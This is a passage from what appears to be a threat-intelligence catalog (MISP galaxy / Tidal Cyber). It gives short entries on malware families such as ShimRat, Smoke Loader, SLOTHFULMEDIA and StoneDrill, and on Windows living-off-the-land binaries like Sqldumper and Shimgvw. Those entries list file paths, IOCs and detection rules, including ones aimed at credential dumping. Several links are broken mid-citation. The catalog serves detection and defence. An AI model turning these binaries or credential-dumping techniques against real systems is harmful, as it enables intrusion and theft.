<sup>[[Shell32.dll - LOLBAS Project](/references/9465358f-e0cc-41f0-a7f9-01d5faca8157)]</sup>

The tag is: misp-galaxy:software="Shell32.dll - Associated Software"

Shell32

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Shell Common Dll

Author: LOLBAS Team

Paths: * c:\windows\system32\shell32.dll * c:\windows\syswow64\shell32.dll

Detection: * Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml) * Splunk: [rundll32_control_rundll_hunt.yml]([Shell32.dll - LOLBAS Project(/references/9465358f-e0cc-41f0-a7f9-01d5faca8157)]</sup>

The tag is: misp-galaxy:software="Shell32"

Shimgvw.dll - Associated Software

<sup>[[Shimgvw.dll - LOLBAS Project](/references/aba1cc57-ac30-400f-8b02-db7bf279dfb6)]</sup>

The tag is: misp-galaxy:software="Shimgvw.dll - Associated Software"

Shimgvw

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Photo Gallery Viewer

Author: Eral4m

Paths: * c:\windows\system32\shimgvw.dll * c:\windows\syswow64\shimgvw.dll

Detection: * IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line<sup>[[Shimgvw.dll - LOLBAS Project](/references/aba1cc57-ac30-400f-8b02-db7bf279dfb6)]</sup>

The tag is: misp-galaxy:software="Shimgvw"

ShimRat

[ShimRat](https://app.tidalcyber.com/software/a3287231-351f-472f-96cc-24db2e3829c7) has been used by the suspected China-based adversary [Mofang](https://app.tidalcyber.com/groups/8bc69792-c26d-4493-87e3-d8e47605fed8) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "[ShimRat](https://app.tidalcyber.com/software/a3287231-351f-472f-96cc-24db2e3829c7)" comes from the malware’s extensive use of Windows Application Shimming to maintain persistence. <sup>[[FOX-IT May 2016 Mofang](https://app.tidalcyber.com/references/f1a08b1c-f7d5-4a91-b3b7-0f042b297842)]</sup>

The tag is: misp-galaxy:software="ShimRat"

ShimRatReporter

[ShimRatReporter](https://app.tidalcyber.com/software/77d9c948-93e3-4e12-9764-4da7570d9275) is a tool used by suspected Chinese adversary [Mofang](https://app.tidalcyber.com/groups/8bc69792-c26d-4493-87e3-d8e47605fed8) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://app.tidalcyber.com/software/a3287231-351f-472f-96cc-24db2e3829c7)) as well as set up faux infrastructure which mimics the adversary’s targets. [ShimRatReporter](https://app.tidalcyber.com/software/77d9c948-93e3-4e12-9764-4da7570d9275) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.<sup>[[FOX-IT May 2016 Mofang](https://app.tidalcyber.com/references/f1a08b1c-f7d5-4a91-b3b7-0f042b297842)]</sup>

The tag is: misp-galaxy:software="ShimRatReporter"

SHIPSHAPE

[SHIPSHAPE](https://app.tidalcyber.com/software/3db0b464-ec5d-4cdd-86c2-62eac9c8acd6) is malware developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that allows propagation and exfiltration of data over removable devices. [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) may use this capability to exfiltrate data across air-gaps. <sup>[[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]</sup>

The tag is: misp-galaxy:software="SHIPSHAPE"

Backdoor.APT.CookieCutter - Associated Software

The tag is: misp-galaxy:software="Backdoor.APT.CookieCutter - Associated Software"

Pirpi - Associated Software

The tag is: misp-galaxy:software="Pirpi - Associated Software"

Sibot

[Sibot](https://app.tidalcyber.com/software/ea0a1282-f2bf-4ae0-a19c-d7e379c2309b) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://app.tidalcyber.com/software/ea0a1282-f2bf-4ae0-a19c-d7e379c2309b) variants in early 2021 during its investigation of [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) and the [SolarWinds Compromise]([MSTIC NOBELIUM Mar 2021(https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)]</sup>

The tag is: misp-galaxy:software="Sibot"

SideTwist

The tag is: misp-galaxy:software="SideTwist"

SILENTTRINITY

[SILENTTRINITY](https://app.tidalcyber.com/software/4765999f-c35e-4a9f-8284-9f10a17e6c34) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. [SILENTTRINITY](https://app.tidalcyber.com/software/4765999f-c35e-4a9f-8284-9f10a17e6c34) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.<sup>[[GitHub SILENTTRINITY March 2022](https://app.tidalcyber.com/references/cff66280-c592-4e3c-a56c-32a9620cf95c)]</sup><sup>[[Security Affairs SILENTTRINITY July 2019](https://app.tidalcyber.com/references/b4945fc0-b89b-445c-abfb-14959deba3d0)]</sup>

The tag is: misp-galaxy:software="SILENTTRINITY"

Siloscape

[Siloscape](https://app.tidalcyber.com/software/8ea75674-cc08-40cf-824c-40eb5cd6097e) is malware that targets Kubernetes clusters through Windows containers. [Siloscape](https://app.tidalcyber.com/software/8ea75674-cc08-40cf-824c-40eb5cd6097e) was first observed in March 2021.<sup>[[Unit 42 Siloscape Jun 2021](https://app.tidalcyber.com/references/4be128a7-97b8-48fa-8a52-a53c1e56f086)]</sup>

The tag is: misp-galaxy:software="Siloscape"

Skeleton Key

[Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761) is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. <sup>[[Dell Skeleton](https://app.tidalcyber.com/references/cea9ce77-7641-4086-b92f-a4c3ad94a49c)]</sup> Functionality similar to [Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761) is included as a module in [Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16).

The tag is: misp-galaxy:software="Skeleton Key"

Skidmap

[Skidmap](https://app.tidalcyber.com/software/cc91d3d4-bbf5-4a9c-b43a-2ba034db4858) is a kernel-mode rootkit used for cryptocurrency mining.<sup>[[Trend Micro Skidmap](https://app.tidalcyber.com/references/53291621-f0ad-4cb7-af08-78b96eb67168)]</sup>

The tag is: misp-galaxy:software="Skidmap"

Sliver

[Sliver](https://app.tidalcyber.com/software/bbd16b7b-7e35-4a11-86ff-9b19e17bdab3) is an open source, cross-platform, red team command and control framework written in Golang.<sup>[[Bishop Fox Sliver Framework August 2019](https://app.tidalcyber.com/references/51e67e37-2d61-4228-999b-bec6f80cf106)]</sup>

The tag is: misp-galaxy:software="Sliver"

JackOfHearts - Associated Software

Kaspersky Labs refers to the "mediaplayer.exe" dropper within [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) as the JackOfHearts.<sup>[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)]</sup>

The tag is: misp-galaxy:software="JackOfHearts - Associated Software"

QueenOfClubs - Associated Software

Kaspersky Labs assesses [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is an older variant of a malware family it refers to as the QueenOfClubs.<sup>[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)]</sup>

The tag is: misp-galaxy:software="QueenOfClubs - Associated Software"

SLOTHFULMEDIA

[SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.<sup>[[CISA MAR SLOTHFULMEDIA October 2020](https://app.tidalcyber.com/references/57c3256c-0d24-4647-9037-fefe1c88ad61)]</sup><sup>[[Costin Raiu IAmTheKing October 2020](https://app.tidalcyber.com/references/2be88843-ed3a-460e-87c1-85aa50e827c8)]</sup> It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.<sup>[[USCYBERCOM SLOTHFULMEDIA October 2020](https://app.tidalcyber.com/references/600de668-f128-4368-8667-24ed9a9db47a)]</sup><sup>[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)]</sup>

In October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is part of an activity cluster it refers to as "IAmTheKing".<sup>[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)]</sup> ESET also noted code similarity between [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) and droppers used by a group it refers to as "PowerPool".<sup>[[ESET PowerPool Code October 2020](https://app.tidalcyber.com/references/d583b409-35bd-45ea-8f2a-c0d566a6865b)]</sup>

The tag is: misp-galaxy:software="SLOTHFULMEDIA"

SLOWDRIFT

The tag is: misp-galaxy:software="SLOWDRIFT"

GRAMDOOR - Associated Software

The tag is: misp-galaxy:software="GRAMDOOR - Associated Software"

Small Sieve

[Small Sieve](https://app.tidalcyber.com/software/c58028b9-2e79-4bc9-9b04-d24ea4dd4948) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least January 2022.<sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup><sup>[[NCSC GCHQ Small Sieve Jan 2022](https://app.tidalcyber.com/references/0edb8946-be38-45f5-a27c-bdbebc383d72)]</sup>

Security researchers have also noted [Small Sieve](https://app.tidalcyber.com/software/c58028b9-2e79-4bc9-9b04-d24ea4dd4948)'s use by UNC3313, which may be associated with [MuddyWater]([Mandiant UNC3313 Feb 2022(https://app.tidalcyber.com/references/ac1a1262-1254-4ab2-a940-2d08b6558e9e)]</sup>

The tag is: misp-galaxy:software="Small Sieve"

SMOKEDHAM

[SMOKEDHAM](https://app.tidalcyber.com/software/9ae4154d-ee48-4aeb-b76f-6e40dbe18ff3) is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.<sup>[[FireEye Shining A Light on DARKSIDE May 2021](https://app.tidalcyber.com/references/6ac6acc2-9fea-4887-99b2-9988991b47b6)]</sup><sup>[[FireEye SMOKEDHAM June 2021](https://app.tidalcyber.com/references/a81ad3ef-fd96-432c-a7c8-ccc86d127a1b)]</sup>

The tag is: misp-galaxy:software="SMOKEDHAM"

Dofoil - Associated Software

The tag is: misp-galaxy:software="Dofoil - Associated Software"

Smoke Loader

[Smoke Loader](https://app.tidalcyber.com/software/2244253f-a4ad-4ea9-a4bf-fa2f4d895853) is a malicious bot application that can be used to load other malware. [Smoke Loader](https://app.tidalcyber.com/software/2244253f-a4ad-4ea9-a4bf-fa2f4d895853) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. <sup>[[Malwarebytes SmokeLoader 2016](https://app.tidalcyber.com/references/b619e338-16aa-478c-b227-b22f78d572a3)]</sup> <sup>[[Microsoft Dofoil 2018](https://app.tidalcyber.com/references/85069317-2c25-448b-9ff4-504e429dc1bf)]</sup>

The tag is: misp-galaxy:software="Smoke Loader"

Snip3

The tag is: misp-galaxy:software="Snip3"

SNUGRIDE

The tag is: misp-galaxy:software="SNUGRIDE"

Socksbot

[Socksbot](https://app.tidalcyber.com/software/c1906bb6-0b5b-4916-8b29-37f7e272f6b3) is a backdoor that abuses Socket Secure (SOCKS) proxies. <sup>[[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)]</sup>

The tag is: misp-galaxy:software="Socksbot"

DARKTOWN - Associated Software

The tag is: misp-galaxy:software="DARKTOWN - Associated Software"

DelfsCake - Associated Software

The tag is: misp-galaxy:software="DelfsCake - Associated Software"

dfls - Associated Software

The tag is: misp-galaxy:software="dfls - Associated Software"

SodaMaster

[SodaMaster](https://app.tidalcyber.com/software/6ecd970c-427b-4421-a831-69f46047d22a) is a fileless malware used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) to download and execute payloads since at least 2020.<sup>[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]</sup>

The tag is: misp-galaxy:software="SodaMaster"

SoftPerfect Network Scanner

SoftPerfect Network Scanner is a tool used to perform network scans for systems management purposes.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="SoftPerfect Network Scanner"

SombRAT

[SombRAT](https://app.tidalcyber.com/software/0ec24158-d5d7-4d2e-b5a5-bc862328a317) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c) ransomware.<sup>[[BlackBerry CostaRicto November 2020](https://app.tidalcyber.com/references/93a23447-641c-4ee2-9fbd-64b2adea8a5f)]</sup><sup>[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]</sup><sup>[[CISA AR21-126A FIVEHANDS May 2021](https://app.tidalcyber.com/references/f98604dd-2881-4024-8e43-6f5f48c6c9fa)]</sup>

The tag is: misp-galaxy:software="SombRAT"

SoreFang

The tag is: misp-galaxy:software="SoreFang"

SPACESHIP

[SPACESHIP](https://app.tidalcyber.com/software/0f8d0a73-9cd3-475a-b31b-d457278c921a) is malware developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that allows propagation and exfiltration of data over removable devices. [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) may use this capability to exfiltrate data across air-gaps. <sup>[[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]</sup>

The tag is: misp-galaxy:software="SPACESHIP"

Spark

[Spark](https://app.tidalcyber.com/software/93f8c180-6794-4e9c-b716-6b31f42eb72d) is a Windows backdoor and has been in use since as early as 2017.<sup>[[Unit42 Molerat Mar 2020](https://app.tidalcyber.com/references/328f1c87-c9dc-42d8-bb33-a17ad4d7f57e)]</sup>

The tag is: misp-galaxy:software="Spark"

SpeakUp

[SpeakUp](https://app.tidalcyber.com/software/b9b67878-4eb1-4a0b-9b36-a798881ed566) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. <sup>[[CheckPoint SpeakUp Feb 2019](https://app.tidalcyber.com/references/8f0d6a8d-6bd4-4df5-aa28-70e1ec4b0b12)]</sup>

The tag is: misp-galaxy:software="SpeakUp"

Sphynx

Sphynx is a variant of BlackCat ransomware (AKA ALPHV or Noberus) first observed in early 2023, which features multiple defense evasion-focused enhancements over the BlackCat strain. For example, Sphynx uses a more complex set of execution parameters, its configuration details are formatted as raw structures instead of JSON, and observed samples contain large amounts of “junk” code and encrypted strings.<sup>[[X-Force BlackCat May 30 2023](/references/b80c1f70-9d05-4f4b-bdc2-6157c6837202)]</sup> Sphynx also features built-in versions of other tools to support specific functions, including the open-source Impacket tool for lateral movement and Remcom, a hacking tool that facilitates remote code execution.<sup>[[Microsoft Threat Intelligence Tweet August 17 2023](/references/8b0ebcb5-d531-4f49-aa2d-bceb5e491b3f)]</sup>

The tag is: misp-galaxy:software="Sphynx"

SpicyOmelette

[SpicyOmelette](https://app.tidalcyber.com/software/2be9e22d-0af8-46f5-b30e-b3712ccf716d) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://app.tidalcyber.com/groups/58db02e6-d908-47c2-bc82-ed58ada61331) since at least 2018.<sup>[[Secureworks GOLD KINGSWOOD September 2018](https://app.tidalcyber.com/references/cda529b2-e152-4ff0-a6b3-d0305b09fef9)]</sup>

The tag is: misp-galaxy:software="SpicyOmelette"

Splashtop Streamer - Associated Software

The tag is: misp-galaxy:software="Splashtop Streamer - Associated Software"

Splashtop

Splashtop is a tool used to enable remote connections to network devices for support and administration.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Splashtop"

spwebmember

[spwebmember](https://app.tidalcyber.com/software/0fdabff3-d996-493c-af67-f3ac02e4b00b) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. <sup>[[NCC Group APT15 Alive and Strong](https://app.tidalcyber.com/references/02a50445-de06-40ab-9ea4-da5c37e066cd)]</sup>

The tag is: misp-galaxy:software="spwebmember"

Sqldumper.exe - Associated Software

<sup>[[Sqldumper.exe - LOLBAS Project](/references/793d6262-37af-46e1-a6b5-a5262f4a749d)]</sup>

The tag is: misp-galaxy:software="Sqldumper.exe - Associated Software"

Sqldumper

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Debugging utility included with Microsoft SQL.

Author: Oddvar Moe

Paths: * C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe * C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe

Detection: * Sigma: [proc_creation_win_lolbin_susp_sqldumper_activity.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml) * Elastic: [credential_access_lsass_memdump_file_created.toml](https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml) * Elastic: [credential_access_cmdline_dump_tool.toml]([Sqldumper.exe - LOLBAS Project(/references/793d6262-37af-46e1-a6b5-a5262f4a749d)]</sup>

The tag is: misp-galaxy:software="Sqldumper"

sqlmap

[sqlmap](https://app.tidalcyber.com/software/96c224a6-6ca4-4ac1-9990-d863ec5a317a) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. <sup>[[sqlmap Introduction](https://app.tidalcyber.com/references/ac643245-d54f-470f-a393-26875c0877c8)]</sup>

The tag is: misp-galaxy:software="sqlmap"

Sqlps.exe - Associated Software

<sup>[[Sqlps.exe - LOLBAS Project](/references/31cc851a-c536-4cef-9391-d3c7d3eab64f)]</sup>

The tag is: misp-galaxy:software="Sqlps.exe - Associated Software"

Sqlps

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.

Author: Oddvar Moe

Paths: * C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe * C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe * C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe * C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe * C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe

The tag is: misp-galaxy:software="Sqlps"

SQLRat

[SQLRat](https://app.tidalcyber.com/software/612f780a-239a-4bd0-a29f-63beadf3ed22) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) has been observed using it.<sup>[[Flashpoint FIN 7 March 2019](https://app.tidalcyber.com/references/b09453a3-c0df-4e96-b399-e7b34e068e9d)]</sup>

The tag is: misp-galaxy:software="SQLRat"

SQLToolsPS.exe - Associated Software

<sup>[[SQLToolsPS.exe - LOLBAS Project](/references/612c9569-80af-48d2-a853-0f6e3f55aa50)]</sup>

The tag is: misp-galaxy:software="SQLToolsPS.exe - Associated Software"

SQLToolsPS

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.

Author: Oddvar Moe

Paths: * C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe

Detection: * Sigma: [proc_creation_win_mssql_sqltoolsps_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml) * Splunk: [2021-10-05-suspicious_copy_on_system32.md]([SQLToolsPS.exe - LOLBAS Project(/references/612c9569-80af-48d2-a853-0f6e3f55aa50)]</sup>

The tag is: misp-galaxy:software="SQLToolsPS"

Squirrel.exe - Associated Software

<sup>[[Squirrel.exe - LOLBAS Project](/references/952b5ca5-1251-4e27-bd30-5d55d7d2da5e)]</sup>

The tag is: misp-galaxy:software="Squirrel.exe - Associated Software"

Squirrel

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Author: Reegun J (OCBC Bank) - @reegun21

Paths: * %localappdata%\Microsoft\Teams\current\Squirrel.exe

Detection: * Sigma: [proc_creation_win_lolbin_squirrel.yml]([Squirrel.exe - LOLBAS Project(/references/952b5ca5-1251-4e27-bd30-5d55d7d2da5e)]</sup>

The tag is: misp-galaxy:software="Squirrel"

Squirrelwaffle

[Squirrelwaffle](https://app.tidalcyber.com/software/46943a69-0b19-4d3a-b2a3-1302e85239a3) is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as [Cobalt Strike](https://app.tidalcyber.com/software/9b6bcbba-3ab4-4a4c-a233-cd12254823f6) and the [QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea) banking trojan.<sup>[[ZScaler Squirrelwaffle Sep 2021](https://app.tidalcyber.com/references/624a62db-f00f-45f9-89f6-2c3505b4979f)]</sup><sup>[[Netskope Squirrelwaffle Oct 2021](https://app.tidalcyber.com/references/5559895a-4647-438f-b3d5-6d6aa323a6f9)]</sup>

The tag is: misp-galaxy:software="Squirrelwaffle"

ssh.exe - Associated Software

<sup>[[ssh.exe - LOLBAS Project](/references/b1a9af1c-0cfc-4e8a-88ac-7d33cddc26a1)]</sup>

The tag is: misp-galaxy:software="ssh.exe - Associated Software"

ssh

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.

Author: Akshat Pradhan

Paths: * c:\windows\system32\OpenSSH\ssh.exe

Detection: * Sigma: [proc_creation_win_lolbin_ssh.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ssh.yml) * IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe. * IOC: command line arguments specifying execution.<sup>[[ssh.exe - LOLBAS Project](/references/b1a9af1c-0cfc-4e8a-88ac-7d33cddc26a1)]</sup>

The tag is: misp-galaxy:software="ssh"

SslMM

The tag is: misp-galaxy:software="SslMM"

Starloader

[Starloader](https://app.tidalcyber.com/software/fc18e220-2200-4d70-a426-0700ba14c4c0) is a loader component that has been observed loading [Felismus](https://app.tidalcyber.com/software/c66ed8ab-4692-4948-820e-5ce87cc78db5) and associated tools. <sup>[[Symantec Sowbug Nov 2017](https://app.tidalcyber.com/references/14f49074-fc46-45d3-bf7e-30c896c39c07)]</sup>

The tag is: misp-galaxy:software="Starloader"

CANOPY - Associated Software

<sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup>

The tag is: misp-galaxy:software="CANOPY - Associated Software"

STARWHALE

[STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) is Windows Script File (WSF) backdoor that has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6), possibly since at least November 2021; there is also a [STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) variant written in Golang with similar capabilities. Security researchers have also noted the use of [STARWHALE](https://app.tidalcyber.com/software/764c6121-2d15-4a10-ac53-b1c431dc8b47) by UNC3313, which may be associated with [MuddyWater]([Mandiant UNC3313 Feb 2022(https://app.tidalcyber.com/references/ac1a1262-1254-4ab2-a940-2d08b6558e9e)]</sup><sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup>

The tag is: misp-galaxy:software="STARWHALE"

DROPSHOT - Associated Software

The tag is: misp-galaxy:software="DROPSHOT - Associated Software"

StoneDrill

[StoneDrill](https://app.tidalcyber.com/software/9eee52a2-5ac1-4561-826c-23ec7fbc7876) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with [APT33]([FireEye APT33 Sept 2017(https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)]</sup><sup>[[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]</sup>

The tag is: misp-galaxy:software="StoneDrill"

Stordiag.exe - Associated Software

<sup>[[Stordiag.exe - LOLBAS Project](/references/5e52a211-7ef6-42bd-93a1-5902f5e1c2ea)]</sup>

The tag is: misp-galaxy:software="Stordiag.exe - Associated Software"

Stordiag

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Storage diagnostic tool

Author: Eral4m

Paths: * c:\windows\system32\stordiag.exe * c:\windows\syswow64\stordiag.exe

Detection: * Sigma: [proc_creation_win_stordiag_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_stordiag_susp_child_process.yml) * IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\<sup>[[Stordiag.exe - LOLBAS Project](/references/5e52a211-7ef6-42bd-93a1-5902f5e1c2ea)]</sup>

The tag is: misp-galaxy:software="Stordiag"

StreamEx

[StreamEx](https://app.tidalcyber.com/software/502b490c-2067-40a4-8f73-7245d7910851) is a malware family that has been used by [Deep Panda](https://app.tidalcyber.com/groups/43f826a1-e8c8-47b8-9b00-38e1b3e4293b) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. <sup>[[Cylance Shell Crew Feb 2017](https://app.tidalcyber.com/references/c0fe5d29-838b-4e91-bd33-59ab3dbcfbc3)]</sup>

The tag is: misp-galaxy:software="StreamEx"

StrifeWater

[StrifeWater](https://app.tidalcyber.com/software/dd8bb0a3-6cb1-412d-adeb-cbaae98462a9) is a remote-access tool that has been used by [Moses Staff](https://app.tidalcyber.com/groups/a41725c5-eb3a-4772-8d1e-17c3bbade79c) in the initial stages of their attacks since at least November 2021.<sup>[[Cybereason StrifeWater Feb 2022](https://app.tidalcyber.com/references/30c911b2-9a5e-4510-a78c-c65e84398c7e)]</sup>

The tag is: misp-galaxy:software="StrifeWater"

W32.Stuxnet - Associated Software

<sup>[[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011](https://app.tidalcyber.com/references/a1b371c2-b2b1-5780-95c8-11f8c616dcf3)]</sup>

The tag is: misp-galaxy:software="W32.Stuxnet - Associated Software"

Stuxnet

